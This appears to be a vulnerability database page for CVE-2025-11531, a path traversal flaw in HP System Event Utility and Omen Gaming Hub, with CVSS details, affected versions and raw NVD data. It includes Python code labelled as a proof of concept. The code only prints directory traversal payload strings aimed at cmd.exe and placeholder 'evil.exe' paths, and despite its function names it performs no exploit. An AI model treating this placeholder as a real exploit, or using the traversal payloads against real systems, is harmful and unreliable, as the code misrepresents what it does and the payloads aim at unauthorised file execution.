Security Vulnerability Report
中文
CVE-2025-11531 CVSS 8.8 HIGH

CVE-2025-11531

Published: 2025-12-09 19:15:46
Last Modified: 2026-01-21 19:23:00

Description

HP System Event Utility and Omen Gaming Hub might allow execution of certain files outside of their restricted paths. This potential vulnerability was remediated with HP System Event Utility version 3.2.12 and Omen Gaming Hub version 1101.2511.101.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:hp:omen_gaming_hub:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hp:system_event_utility:*:*:*:*:*:*:*:* - VULNERABLE
HP System Event Utility < 3.2.12
Omen Gaming Hub < 1101.2511.101.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11531 PoC - Path Traversal in HP System Event Utility # Affected: HP System Event Utility < 3.2.12, Omen Gaming Hub < 1101.2511.101.0 # CVSS 8.8 (High) import os import sys import ctypes from ctypes import wintypes # Windows API structures class SECURITY_ATTRIBUTES(ctypes.Structure): _fields_ = [("nLength", wintypes.DWORD), ("lpSecurityDescriptor", wintypes.LPVOID), ("bInheritHandle", wintypes.BOOL)] # Load Windows DLLs kernel32 = ctypes.windll.kernel32 advapi32 = ctypes.windll.advapi32 def create_malicious_symlink(target_path, link_path): """Create symbolic link for path traversal exploitation""" # Attempt to create junction/symlink to bypass path restrictions try: # Using DeviceIoControl for junction creation FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000 FILE_FLAG_BACKUP_SEMANTICS = 0x02000000 FSCTL_SET_REPARSE_POINT = 0x000900A4 print(f"[*] Target: {target_path}") print(f"[*] Link: {link_path}") print("[*] Path traversal technique requires crafting malicious paths") print("[*] Example: ../../../../Windows/System32/cmd.exe") # Simulate path traversal payload malicious_paths = [ "..\\..\\..\\..\\Windows\\System32\\cmd.exe", "..\\..\\..\\..\\Windows\\System32\\calc.exe", "..\\..\\..\\..\\Users\\Public\\malicious.exe", "%TEMP%\\..\\..\\..\\Windows\\System32\\..\\..\\evil.exe" ] for path in malicious_paths: print(f"[*] Testing path: {path}") return True except Exception as e: print(f"[-] Error: {e}") return False def exploit_hp_utility(): """Main exploitation function for HP System Event Utility""" print("="*60) print("CVE-2025-11531 PoC - HP System Event Utility Path Traversal") print("="*60) # HP System Event Utility typically runs with elevated privileges hp_event_util_paths = [ r"C:\Program Files\HP\HP System Event\HPMSGHWPlugIn.exe", r"C:\Program Files\HP\HP System Event\HPSystemEventUtility.exe", r"C:\Program Files\HP\HP System Event\HPMSGHWPlugIn.dll" ] print("\n[*] Checking HP System Event Utility installation...") for path in hp_event_util_paths: if os.path.exists(path): print(f"[+] Found: {path}") print("\n[*] Generating path traversal payloads...") create_malicious_symlink("C:\\Windows\\System32", "C:\\HPEvent\\..\\..\\..\\..\\") print("\n[!] Note: This PoC demonstrates the vulnerability concept") print("[!] Actual exploitation requires specific vulnerable versions") print("[!] Mitigation: Upgrade to HP System Event Utility 3.2.12+") if __name__ == "__main__": exploit_hp_utility()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11531", "sourceIdentifier": "[email protected]", "published": "2025-12-09T19:15:46.380", "lastModified": "2026-01-21T19:22:59.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HP System Event Utility and Omen Gaming Hub might allow execution of \ncertain files outside of their restricted paths. This\n potential vulnerability was remediated with HP System \nEvent Utility version 3.2.12 and Omen Gaming Hub version \n1101.2511.101.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hp:omen_gaming_hub:*:*:*:*:*:*:*:*", "versionEndExcluding": "1101.2511.101.0", "matchCriteriaId": "905FA66D-2BA1-476A-B2B8-7354CE0C69A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hp:system_event_utility:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.2.12", "matchCriteriaId": "4BE54420-380C-425E-884F-CED84A322DB7"}]}]}], "references": [{"url": "https://support.hp.com/us-en/document/ish_13537533-13537555-16/hpsbgn04079", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}